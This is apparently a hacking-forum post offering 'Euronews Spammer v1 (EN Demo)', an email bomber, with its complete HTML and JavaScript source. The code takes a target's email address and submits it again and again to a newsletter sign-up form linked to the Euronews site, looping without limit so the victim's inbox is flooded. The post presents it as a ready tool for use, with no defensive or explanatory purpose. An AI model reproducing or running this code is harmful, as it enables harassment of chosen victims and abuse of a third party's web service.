Group: User Level:
Posts: 77 Joined: 6/3/2023 IP-Address: saved
| Euronews Spammer v1 (EN Demo) is a simple email bomber that takes advantage of the mail function from the Euronews site. This is the demo version and it only sends spam in english. The complete version let the user choose the language of the emails and the number of emails.
Euronews Spammer v1.html
<html> <title>Euronews Spammer v1 (EN demo)</title> <script src="http://code.jquery.com/jquery-1.11.0.js"></script> <script>alert('This tool will send spam emails until you close it.');</script> <body> <br><br><br> <center> <h3>Fill the email to spam...</h3> <table> <tr><td>Target Email : </td><td><input type="text" id="email"></td></tr> <tr><td></td><td><input type="submit" value="Send!" style="width: 100%" onclick="send();"> <script> function send() { var email = document.getElementById("email").value; if (email == "") {alert('Type a email!');return false;} var dataString = "utf8=â&contact[contact_fields_attributes][1463637][value]=0&contact[contact_fields_attributes][1463637][label]=ownpage_cookie_id&contact[contact_fields_attributes][1463637][custom_field_data_id]=1463637&contact[contact_fields_attributes][1463637][custom_field_id]=3753866&contact[contact_fields_attributes][1463636][value]=fef8fa309d8be8fd&contact[contact_fields_attributes][1463636][label]=form_key&contact[contact_fields_attributes][1463636][custom_field_data_id]=1463636&contact[contact_fields_attributes][1463636][custom_field_id]=4091505&contact[contact_fields_attributes][1463638][value]="+email+"&contact[contact_fields_attributes][1463638][label]=Email&contact[contact_fields_attributes][1463638][custom_field_data_id]=1463638&contact[contact_fields_attributes][1463638][custom_field_id]=3353270&referrer=https://www.euronews.com/follow-us&email_address="+email+"&visitor_id=eff49f3b-9bb8-4e8a-be74-b0aa049268ec"; $.ajax({type: "POST", url: "https://forms.mailmunch.co/form/317853/582202/submit", data: dataString, cache: false,}); send(); } </script> </div> </body> </html>
|